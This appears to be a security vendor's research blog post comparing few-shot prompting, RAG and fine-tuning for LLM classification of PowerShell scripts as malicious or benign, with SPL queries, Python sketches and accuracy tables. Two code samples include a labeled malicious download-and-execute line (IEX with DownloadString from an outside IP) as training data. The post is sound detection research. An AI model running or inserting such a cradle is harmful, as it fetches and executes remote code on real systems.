Defending at Machine Speed: Guiding LLMs with Security Context

Large Language Models (LLMs) provide strong reasoning and data summarization capabilities, making them valuable proxies for a variety of cybersecurity operations tasks. However, their performance can decline when applied to highly specific or enterprise-contextual tasks, particularly if the models rely solely on public internet data.

This research explores methods to guide LLMs toward targeted security objectives — specifically through continuing our exploration of methods for the classification of PowerShell scripts. By adapting our DSDL workflow to include few-shot learning, Retrieval Augmented Generation (RAG), and fine-tuning, we evaluate the potential performance gains and trade-offs across each technique.

Few-Shot Learning: Teaching by Example

Our first method builds on the prompt from our baseline test, where we asked various open-weight models to perform PowerShell classification in the Splunk platform. Few-shot learning provides the model with a handful of examples, along with their labels, to assist in a classification task. Giving the model a few labeled examples (typically 1 to 5) can help it learn a pattern, or the attributes that differentiate the underlying classes. The number of examples you can use is constrained by the model's context length, which includes your prompt, any example inputs, instructions, and the model's own responses. Tokens, roughly corresponding to words or word-parts, are the units that fill this space.

For example, if a model has a 4,000-token context length, you can prompt it with a few paragraphs of text, several examples, and a task description, as long as the total stays under 4,000 tokens. If you exceed that limit, the model will either ignore earlier content or fail to respond correctly. With a larger context length, users can include dozens or even hundreds of examples in the prompt, a technique called many-shot learning, which often provides better performance on top of this on-the-fly flexibility.
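
As a rough illustration of that budgeting, the sketch below checks whether a task description and a set of examples fit inside a context window. The limits and the four-characters-per-token ratio are assumptions made for the sake of the sketch, not exact figures for any particular model:

CONTEXT_LIMIT = 4000        # tokens available to the model (assumed)
RESPONSE_RESERVE = 200      # leave room for the model's own answer (assumed)

def estimate_tokens(text: str) -> int:
    # Rough heuristic: ~4 characters per token; use the model's real tokenizer for exact counts
    return len(text) // 4

def fits_in_context(task_description: str, examples: list[str]) -> bool:
    # Total the task description and every candidate example against the budget
    used = estimate_tokens(task_description) + sum(estimate_tokens(e) for e in examples)
    return used <= CONTEXT_LIMIT - RESPONSE_RESERVE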

The model for this test, Llama3-8B, supports a context length of approximately 8,000 tokens. After calculating the average script length in our dataset, we found that six examples (three per class) could be accommodated without truncation. Will just a few examples be enough to improve PowerShell classification accuracy?

For this test we manually modified DSDL’s llm_rag_ollama_text_processing notebook to append the examples directly into the prompt, then used SPL to initiate the classification and analyze the results:

index="powershell_encoded" encoded=*
| eval seed="19844"
| eval hash_val = tonumber(substr(md5(seed . label . Content), 1, 8), 16)
| eval rand_val = hash_val / 4294967295
| eventstats count AS total_count BY label
| sort label rand_val
| streamstats count AS class_count BY label
| where class_count <= 500
| table Content, label
| rename Content as text
| fit MLTKContainer algo=RF_llm_rag_ollama_text_processing_megaprompt model_name="llama3" prompt="You are a cybersecurity expert. Classify the intent of the PowerShell script. Choose from 'malicious' or 'benign'. Only output the category name in your answer." text into app:RF_llm_rag_ollama_text_processing as LLM
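
The notebook modification itself is small. A minimal sketch of the idea is shown below; the example scripts and helper name are hypothetical illustrations, not the notebook's actual code:

# Hypothetical sketch of the notebook change: prepend a handful of labeled
# examples to the instruction before the text is sent to the model.
FEW_SHOT_EXAMPLES = [
    ("Get-ChildItem C:\\Users\\Public | Sort-Object Length", "benign"),
    ("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/x.ps1')", "malicious"),
    # ...plus four more labeled examples, for a total of three per class
]

def build_few_shot_prompt(instruction: str, script: str) -> str:
    # Render each example as a script/label pair, then append the script to classify
    shots = "\n\n".join(
        f"Script:\n{example}\nLabel: {label}" for example, label in FEW_SHOT_EXAMPLES
    )
    return f"{instruction}\n\n{shots}\n\nScript:\n{script}\nLabel:"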

Findings

With just a handful of examples, we observed a boost in the precision and accuracy of the model of +8% and +6% respectively for PowerShell classification. In practice, this means more of the scripts flagged as malicious really are malicious, with no added cost in average response time.

Method            | Precision | Recall | Accuracy | F1   | Avg Response
Baseline          | 0.78      | 1.00   | 0.86     | 0.87 | 0.74 seconds
Few-Shot Learning | 0.86      | 0.99   | 0.92     | 0.92 | 0.74 seconds

Here are some other tips for getting the most out of few-shot learning:

Retrieval Augmented Generation (RAG): Memory On-Demand

Our second method, RAG, increases the technical complexity a bit, with the aim of improving accuracy enough to justify the effort. RAG uses a vector database to store encoded data that is retrieved to provide context for the prompt a user submits to the model. To use RAG with DSDL, you must run the Milvus container alongside Ollama.

To support PowerShell classification, we first embed a series of malicious and benign scripts as vector data using the ‘DSDL Encoding Assistant’. Once the data is embedded (represented as numerical vectors) in the Milvus database, we use the LLM-RAG Assistant, or llm_rag_script notebook, to query the model with the new collection of data as context. The parameter top_k controls how many retrieved examples (PowerShell script samples) are selected based on their vector similarity to the input query.
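
Conceptually, the embedding step looks something like the sketch below, shown here with sentence-transformers and pymilvus called directly. The endpoint, field layout, and sample scripts are illustrative assumptions; in practice, the DSDL Encoding Assistant handles this step for you:

# Illustrative sketch only: the endpoint, schema, and sample scripts are
# assumptions, and the DSDL Encoding Assistant performs this step in practice.
from pymilvus import MilvusClient
from sentence_transformers import SentenceTransformer

embedder = SentenceTransformer("all-MiniLM-L6-v2")       # produces 384-dimensional vectors
client = MilvusClient(uri="http://localhost:19530")      # assumed Milvus endpoint

client.create_collection(collection_name="RAG_final", dimension=384)

scripts = [
    {"text": "Get-Service | Where-Object {$_.Status -eq 'Running'}", "label": "benign"},
    {"text": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/x.ps1')", "label": "malicious"},
]

# Encode each script and store the vector alongside its text and label
vectors = embedder.encode([s["text"] for s in scripts])
rows = [
    {"id": i, "vector": vectors[i].tolist(), "text": s["text"], "label": s["label"]}
    for i, s in enumerate(scripts)
]
client.insert(collection_name="RAG_final", data=rows)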

To put all of this in context, when the model begins classifying a new sample, it first looks at the script in question in vectorized form. Using the vector store's distance metrics, it retrieves the top_k closest samples as additional context for the classification decision. Running this on our repeated random sample looks like:

index="powershell_encoded" encoded=*
| eval seed="19844"
| eval hash_val = tonumber(substr(md5(seed . label . Content), 1, 8), 16)
| eval rand_val = hash_val / 4294967295
| eventstats count AS total_count BY label
| sort label rand_val
| streamstats count AS class_count BY label
| where class_count <= 500
| table Content, label
| rename Content as query
| eval query = "You are a cybersecurity expert. Classify the intent of the PowerShell script. Choose from 'malicious' or 'benign'. Only output the category name in your answer." + query
| fit MLTKContainer algo=llm_rag_script model_name=llama3 embedder_name="all-MiniLM-L6-v2" use_local=1 embedder_dimension=384 collection_name=RAG_final top_k=2 rag_type=Documents query into app:llm_rag_script
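
Under the hood, the retrieval step amounts to something like the following sketch, which continues from the embedding example above. The helper names are hypothetical; the llm_rag_script notebook performs the actual wiring into the Ollama call:

# Hypothetical helpers continuing the sketch above: embed the new script,
# pull the top_k most similar stored samples, and fold them into the prompt.
def retrieve_context(client, embedder, script: str, top_k: int = 2) -> list[dict]:
    query_vector = embedder.encode([script])[0].tolist()
    hits = client.search(
        collection_name="RAG_final",
        data=[query_vector],
        limit=top_k,
        output_fields=["text", "label"],
    )
    # search() returns one result list per query vector; keep the stored fields
    return [hit["entity"] for hit in hits[0]]

def build_rag_prompt(instruction: str, script: str, neighbors: list[dict]) -> str:
    # Present each retrieved sample with its label as context, then the script to classify
    context = "\n\n".join(f"Similar script ({n['label']}):\n{n['text']}" for n in neighbors)
    return f"{instruction}\n\n{context}\n\nScript to classify:\n{script}"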

Findings

Using RAG, we observed our biggest improvements yet in precision (+19%) and accuracy (+7%) from baseline, with some opportunity cost in recall and response time. In tasks like PowerShell classification, where malicious samples can vary wildly (e.g., obfuscation, LOLBins, encoded strings), it’s inefficient to pack dozens or hundreds of examples into a static few-shot prompt. Instead, RAG can target only the most similar patterns using vector search, while avoiding irrelevant noise. Gathering this additional context does create a trade-off: improved accuracy comes at the cost of increased response time. Interestingly, in this case, pulling the closest four examples (top_k=4) did not improve accuracy over pulling just the closest two (top_k=2), while more than doubling the response time.

Configurations tested: Stand-Alone Inference (baseline), Few-shot Learning (6 examples: 3 malicious / 3 benign), LLM-RAG (top_k=2 and top_k=4)

Method            | Precision | Recall | Accuracy | F1   | Avg Response
Baseline          | 0.78      | 1.00   | 0.86     | 0.87 | 0.74 seconds
Few-shot Learning | 0.86      | 0.99   | 0.92     | 0.92 | 0.74 seconds
LLM-RAG top_k=2   | 0.97      | 0.89   | 0.93     | 0.93 | 2.5 seconds
LLM-RAG top_k=4   | 0.96      | 0.89   | 0.93     | 0.92 | 6.3 seconds

Here are some other tips for getting the most out of RAG:

Fine-Tuning: From Generalist to Specialist

The final option for targeting a particular security problem is to fine-tune an existing pre-trained model to your specific domain or use case. Fine-tuning builds on the general language knowledge and reasoning of the base model, but modifies the weights slightly in a training process based on additional data. Fine-tuning requirements vary depending on the method used, but can require significant investment of time, and financial and compute resources.

While we can fine-tune Llama3, its decoder-only architecture is better suited for text generation and reasoning tasks than for classification specifically. This year, Cisco’s Foundation AI team released Foundation-Sec-8B, an open-weight model fine-tuned for cybersecurity applications and based on the Llama3-8B model. Foundation-Sec-8B is a great asset for supporting a variety of generalized security use cases.

For the PowerShell classification task at hand, an encoder-only model like RoBERTa, which is specifically designed to encode meaningful representations of its input text, is much better suited. To test the performance of this option alongside few-shot learning and RAG, we performed full fine-tuning to create a variant called neon-RoBERTa, adding a small neural network layer on top of the pretrained model to perform the binary PowerShell classification task.
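
A minimal sketch of that setup using the Hugging Face Transformers Trainer is shown below. The file names and hyperparameters are illustrative assumptions, not our exact neon-RoBERTa training configuration; the CSV files are assumed to hold a text column with the script and an integer label column (0 = benign, 1 = malicious):

from datasets import load_dataset
from transformers import (AutoModelForSequenceClassification, AutoTokenizer,
                          Trainer, TrainingArguments)

# RoBERTa base model with a freshly initialized binary classification head
tokenizer = AutoTokenizer.from_pretrained("roberta-base")
model = AutoModelForSequenceClassification.from_pretrained("roberta-base", num_labels=2)

# Assumed CSV layout: a "text" column with the script and an integer "label" column
dataset = load_dataset("csv", data_files={"train": "powershell_train.csv",
                                          "test": "powershell_test.csv"})

def tokenize(batch):
    # Truncate long scripts to RoBERTa's 512-token input limit
    return tokenizer(batch["text"], truncation=True, padding="max_length", max_length=512)

dataset = dataset.map(tokenize, batched=True)

args = TrainingArguments(output_dir="neon-roberta", num_train_epochs=3,
                         per_device_train_batch_size=16, learning_rate=2e-5)
trainer = Trainer(model=model, args=args,
                  train_dataset=dataset["train"], eval_dataset=dataset["test"])
trainer.train()

# Save the fine-tuned weights and tokenizer for inference
trainer.save_model("neon-roberta")
tokenizer.save_pretrained("neon-roberta")

Because this is full fine-tuning, the classification head and the pretrained RoBERTa weights are updated together; once trained, the saved model can be loaded with the Transformers text-classification pipeline for fast per-sample scoring.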

Findings

Our fine-tuned, encoder-only model shows how well we can optimize performance and accuracy by specializing in a narrow task, but with the highest level of resources invested in building a solution. Overall, this model boosts precision by 21% and accuracy by 13% over baseline, while also reducing classification time by 99% per sample. This model does not, however, have the inherent natural language abilities of a decoder model like Llama3, or the security domain knowledge of Foundation-Sec-8B; it only performs PowerShell classification.

Method                | Precision | Recall | Accuracy | F1   | Avg Response
Baseline              | 0.78      | 1.00   | 0.86     | 0.87 | 0.74 seconds
Few-shot Learning     | 0.86      | 0.99   | 0.92     | 0.92 | 0.74 seconds
LLM-RAG top_k=2       | 0.97      | 0.89   | 0.93     | 0.93 | 2.5 seconds
LLM-RAG top_k=4       | 0.96      | 0.89   | 0.93     | 0.92 | 6.3 seconds
Fine-tuning (RoBERTa) | 0.99      | 0.98   | 0.99     | 0.99 | 7.7 microseconds

Here are some final considerations for fine-tuning:

Conclusion

When applying LLMs to a security problem, there are many options available beyond your base prompt that can help guide the model to a better output. We’ve explored few-shot learning and RAG with DSDL, as well as fine-tuning, and measured significant improvements from each method over our baseline prompt for PowerShell classification.

Few-shot learning and RAG rely on squeezing high-quality examples and relevant information into the context length to help guide the model’s output. The larger the context length, the more information the model can use to reason effectively. When in doubt, consider adding some samples to your prompt; even a small set of examples notably boosted performance in our test case. For more complex challenges, RAG performed particularly well because of its ability to pull only the most relevant examples into context.

Fine-tuning can tailor a model’s knowledge toward better performance in a specific domain or task. Foundation models are best suited for multi-purpose use cases, but can be guided into performing classification. However, for best results on narrow tasks like security classification, it was simpler and faster to fine-tune an existing encoder-only model.

With the rapid pace of AI advancement, there are increasingly more analysis options and opportunities to apply them in cybersecurity. These tools and techniques can be extremely powerful at accelerating and improving detection efforts like in our model-in-the-loop threat hunting concept. We hope this research helps you better understand your options, and guides you towards getting the most out of your security data with Splunk!
